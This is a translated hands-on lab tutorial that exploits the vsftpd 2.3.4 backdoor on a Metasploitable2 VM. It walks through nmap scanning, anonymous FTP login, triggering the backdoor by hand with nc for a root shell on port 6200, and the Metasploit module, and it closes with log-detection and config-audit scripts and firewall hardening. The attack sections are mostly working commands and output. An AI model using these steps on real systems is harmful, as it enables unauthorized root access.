
Key points! Pure hands-on content! FTP vulnerability exploitation

黑掌team


I. Environment

Target IP: VM ip.149    OS: Metasploitable2-Linux    FTP version: vsftpd 2.3.4

Attacker IP: VM ip.151    OS: Kali-linux-2019

ip: an address on the same subnet; the actual prefix is hidden here. For this lab it is enough that both hosts are on the same subnet.

II. Introduction to the FTP protocol

The File Transfer Protocol (FTP) is the standard protocol for transferring files over a network; it uses the client/server model and sits in the application layer of the network protocol stack. FTP uses port 21.

User categories:

- Real users
- Administrator
- Anonymous users

FTP transfer modes:

- ASCII
- Binary

III. Anonymous user login

1. Confirm the target IP address

    root@kali:~# nmap ip.1/24
    ...
    Nmap scan report for ip.149
    Host is up (0.00050s latency).
    Not shown: 977 closed ports
    PORT     STATE SERVICE
    21/tcp   open  ftp
    22/tcp   open  ssh
    23/tcp   open  telnet
    25/tcp   open  smtp
    53/tcp   open  domain
    80/tcp   open  http
    111/tcp  open  rpcbind
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    512/tcp  open  exec
    513/tcp  open  login
    514/tcp  open  shell
    1099/tcp open  rmiregistry
    1524/tcp open  ingreslock
    2049/tcp open  nfs
    2121/tcp open  ccproxy-ftp
    3306/tcp open  mysql
    5432/tcp open  postgresql
    5900/tcp open  vnc
    6000/tcp open  X11
    6667/tcp open  irc
    8009/tcp open  ajp13
    8180/tcp open  unknown
    MAC Address: 00:0C:29:83:F3:95 (VMware)
    ...

Note: only part of the scan output is shown; it confirms the target's IP as ip.149.

2. Confirm the FTP version

    root@kali:~# nmap -A ip.149
    ...
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 2.3.4
    |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | ftp-syst:
    |   STAT:
    | FTP server status:
    |      Connected to ip.151
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      vsFTPd 2.3.4 - secure, fast, stable
    |_End of status
    ...

Note:

-A: aggressive scan, which detects the OS version, service versions and more.

3. Anonymous user login

    root@kali:~# nc ip.149 21
    220 (vsFTPd 2.3.4)
    USER anonymous
    331 Please specify the password.
    PASS 123
    230 Login successful.
    HELP
    214-The following commands are recognized.
     ABOR ACCT ALLO APPE CDUP CWD  DELE EPRT EPSV FEAT HELP LIST MDTM MKD
     MODE NLST NOOP OPTS PASS PASV PORT PWD  QUIT REIN REST RETR RMD  RNFR
     RNTO SITE SIZE SMNT STAT STOR STOU STRU SYST TYPE USER XCUP XCWD XMKD
     XPWD XRMD
    214 Help OK.

USER/PASS: enter the username (anonymous) and any password.

With the anonymous username and an arbitrary password, the login to the target succeeds.

Enter HELP to list the commands the server recognizes.

IV. Exploiting the FTP backdoor vulnerability

1. Scan for the FTP backdoor vulnerability with nmap

    root@kali:~# nmap --script=vuln -p 21 ip.149
    Starting Nmap 7.80 (  ) at 2020-05-21 15:15 CST
    Nmap scan report for 192.168.72.149
    Host is up (0.00036s latency).

    PORT   STATE SERVICE
    21/tcp open  ftp
    |_clamav-exec: ERROR: Script execution failed (use -d to debug)
    | ftp-vsftpd-backdoor:
    |   VULNERABLE:
    |   vsFTPd version 2.3.4 backdoor
    |     State: VULNERABLE (Exploitable)
    |     IDs:  CVE:CVE-2011-2523  BID:48539
    |       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
    |     Disclosure date: 2011-07-03
    |     Exploit results:
    |       Shell command: id
    |       Results: uid=0(root) gid=0(root)
    |     References:
    |_      :
    MAC Address: 00:0C:29:83:F3:95 (VMware)

    Nmap done: 1 IP address (1 host up) scanned in 11.69 seconds

CVE: Common Vulnerabilities and Exposures

2. Trigger the vsftpd 2.3.4 backdoor vulnerability with nc

    root@kali:~# nc ip.149 21
    220 (vsFTPd 2.3.4)
    USER user:)
    331 Please specify the password.
    PASS pass

Open another terminal and use the vulnerability:

    root@kali:~# nc ip.149 6200
    id
    uid=0(root) gid=0(root)

nc is now connected to the target's bash, and Linux commands can be entered.

nc <target IP> <port>

Triggering the vsftpd vulnerability by hand: during FTP authentication, if the username given to USER contains :), a shell listening on port 6200 is opened directly.

Port 6200 is not open by default, as the scan used to confirm the target IP shows.
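As an added defender-side example (not part of the original post), the following Python script scans vsftpd command logs for the USER trigger described above. It assumes log_ftp_protocol=YES so that vsftpd records each command in /var/log/vsftpd.log; the log line layout and the sample lines are constructed for illustration.

```python
import re

# Constructed sample lines in the layout vsftpd uses for /var/log/vsftpd.log
# with log_ftp_protocol=YES (layout assumed; not taken from the original post).
SAMPLE_LOG = """\
Thu May 21 15:30:01 2020 [pid 2] CONNECT: Client "192.168.72.151"
Thu May 21 15:30:02 2020 [pid 2] FTP command: Client "192.168.72.151", "USER anonymous"
Thu May 21 15:30:02 2020 [pid 2] FTP response: Client "192.168.72.151", "331 Please specify the password."
Thu May 21 15:31:10 2020 [pid 3] CONNECT: Client "192.168.72.151"
Thu May 21 15:31:11 2020 [pid 3] FTP command: Client "192.168.72.151", "USER user:)"
Thu May 21 15:32:00 2020 [pid 4] FTP command: Client "10.0.0.7", "USER bob:)"
"""

# Captures the client address and the argument of a logged USER command.
USER_CMD = re.compile(r'FTP command: Client "([^"]+)", "USER (.*)"$')

def find_backdoor_triggers(log_text):
    """Return (client, username) pairs whose USER argument contains the ':)'
    sequence that activates the vsftpd 2.3.4 backdoor (CVE-2011-2523).
    No legitimate username needs this sequence, so every hit deserves an alert."""
    hits = []
    for line in log_text.splitlines():
        m = USER_CMD.search(line)
        if m and ":)" in m.group(2):
            hits.append((m.group(1), m.group(2)))
    return hits

def attempts_per_client(hits):
    """Count trigger attempts per source address for triage."""
    counts = {}
    for client, _ in hits:
        counts[client] = counts.get(client, 0) + 1
    return counts

if __name__ == "__main__":
    hits = find_backdoor_triggers(SAMPLE_LOG)
    for client, user in hits:
        print(f"ALERT: vsftpd backdoor trigger from {client}: USER {user!r}")
    print("attempts per client:", attempts_per_client(hits))
```

A second, independent signal is an unexpected listener on TCP 6200 on the FTP host, which the first nmap scan in this post shows is closed on a healthy system.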

V. Metasploit in practice: FTP vulnerability exploitation

1. Start postgresql

    root@kali:~# systemctl start postgresql
    root@kali:~# systemctl status postgresql
     postgresql.service - PostgreSQL RDBMS
         Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor p>
         Active: active (exited) since Thu 2020-05-21 15:22:14 CST; 15s ago
        Process: 6362 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
       Main PID: 6362 (code=exited, status=0/SUCCESS)

    May 21 15:22:14 kali systemd[1]: Starting PostgreSQL RDBMS...
    May 21 15:22:14 kali systemd[1]: Finished PostgreSQL RDBMS.

systemctl start postgresql: start the postgresql database

systemctl status postgresql: check the status of the postgresql database

2. Penetration testing with Metasploit

2.1 Open the msfconsole console

    root@kali:~# msfconsole

2.2 Connect to a DB

    msf5 > db_connect msf:123456@127.0.0.1/msf

This connects to Metasploit's default msf database; you can also create your own database and connect to that. The database stores the scan results.

2.3 Probe the target FTP service with nmap

    msf5 > db_nmap -sV -p 21 ip.149
    [*] Nmap: Starting Nmap 7.80 (  ) at 2020-05-21 20:18 CST
    [*] Nmap: Nmap scan report for 192.168.72.149
    [*] Nmap: Host is up (0.00032s latency).
    [*] Nmap: PORT   STATE SERVICE VERSION
    [*] Nmap: 21/tcp open  ftp     vsftpd 2.3.4
    [*] Nmap: MAC Address: 00:0C:29:83:F3:95 (VMware)
    [*] Nmap: Service Info: OS: Unix
    [*] Nmap: Service detection performed. Please report any incorrect results at  .
    [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 2.70 seconds

2.4 View the scan records in the database

    msf5 > services
    Services
    ========

    host    port  proto  name  state  info
    ----    ----  -----  ----  -----  ----
    ip.149  21    tcp    ftp   open   vsftpd 2.3.4

2.5 Search for the exploit module

    msf5 > search vsftpd 2.3.4

    Matching Modules
    ================

       #  Name                                                      Disclosure Date  Rank       Check  Description
       -  ----                                                      ---------------  ----       -----  -----------
       0  auxiliary/gather/teamtalk_creds                                            normal     No     TeamTalk Gather Credentials
       1  exploit/multi/http/oscommerce_installer_unauth_code_exec  2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution
       2  exploit/multi/http/struts2_namespace_ognl                 2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
       3  exploit/unix/ftp/vsftpd_234_backdoor                      2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

2.6 Configure the payload settings

    msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

    Module options (exploit/unix/ftp/vsftpd_234_backdoor):

       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT   21               yes       The target port (TCP)

    Exploit target:

       Id  Name
       --  ----
       0   Automatic

2.7 Set the target IP address and check that the setting took effect

    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS ip.149
    RHOSTS => ip.149
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

    Module options (exploit/unix/ftp/vsftpd_234_backdoor):

       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS  ip.149           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT   21               yes       The target port (TCP)

    Exploit target:

       Id  Name
       --  ----
       0   Automatic

2.8 Run the exploit and obtain a Bash shell

    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

    [*] ip.149:21 - Banner: 220 (vsFTPd 2.3.4)
    [*] ip.149:21 - USER: 331 Please specify the password.
    [+] ip.149:21 - Backdoor service has been spawned, handling...
    [+] ip.149:21 - UID: uid=0(root) gid=0(root)
    [*] Found shell.
    [*] Command shell session 1 opened (0.0.0.0:0 -> ip.149:6200) at 2020-05-21 15:53:08 +0800

    whoami
    root

Verify that this is the target's Bash shell: entering whoami shows the logged-in user is root. Other commands can be entered as well.

VI. Hardening against the FTP vulnerability

1. Edit the system FTP configuration file (/etc/vsftpd/vsftpd.conf) to disable anonymous login.

2. Patch the specific vulnerability, or add firewall rules that block connections to the backdoor port.

    iptables -A INPUT -p tcp --dport 6200 -j DROP
    iptables -A OUTPUT -p tcp --sport 6200 -j DROP
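An added example, not from the original post: a small Python audit of vsftpd.conf that reports the weak settings discussed in this section, with a constructed weak configuration next to a hardened one. The option names are standard vsftpd options; the values assumed for keys that are absent follow the vsftpd.conf man page.

```python
# Constructed sample configurations (not from the original post).
WEAK_CONF = """\
anonymous_enable=YES
local_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
"""
HARDENED_CONF = """\
anonymous_enable=NO
local_enable=YES
write_enable=NO
chroot_local_user=YES
ssl_enable=YES
xferlog_enable=YES
log_ftp_protocol=YES
"""

def parse_vsftpd_conf(text):
    """Parse key=value lines; blanks and '#' comments are skipped and a
    repeated key keeps its last value, as vsftpd itself does."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf

# (option, vsftpd default when the key is absent, risky value, message).
# Defaults follow the vsftpd.conf man page (anonymous_enable defaults to YES).
CHECKS = [
    ("anonymous_enable", "YES", "YES", "anonymous login allowed; set anonymous_enable=NO"),
    ("anon_upload_enable", "NO", "YES", "anonymous users may upload files"),
    ("anon_mkdir_write_enable", "NO", "YES", "anonymous users may create directories"),
    ("ssl_enable", "NO", "NO", "control and data channels are plain text; enable TLS"),
    ("log_ftp_protocol", "NO", "NO", "FTP commands are not logged, so USER probes cannot be reviewed"),
]

def audit(text):
    """Return one finding string per weak setting, in CHECKS order."""
    conf = parse_vsftpd_conf(text)
    findings = []
    for key, default, risky, msg in CHECKS:
        if conf.get(key, default).upper() == risky:
            findings.append(f"{key}: {msg}")
    return findings

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(text) or ["no findings"])
```

Disabling anonymous login closes the login shown in section III, but the 2.3.4 backdoor fires on the USER command before any password is checked, so item 2 (patching or upgrading vsftpd, plus the firewall rules) is still required.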

That is all for FTP vulnerability exploitation. 黑掌team publishes new cybersecurity content every day; if you are interested, follow us or visit the WeChat public account 黑掌 for more.
